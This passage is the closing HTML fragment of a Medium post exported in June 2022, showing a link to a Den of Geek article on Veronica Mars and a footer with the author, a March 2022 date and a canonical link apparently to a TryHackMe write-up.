target="_blank">https://www.denofgeek.com/tv/how-veronica-mars-transcended-its-many-genres/</a></p></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/4853122e4ec1"><time class="dt-published" datetime="2022-03-30T06:05:01.741Z">March 30, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/tryhackme-writeup-ide-4853122e4ec1" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>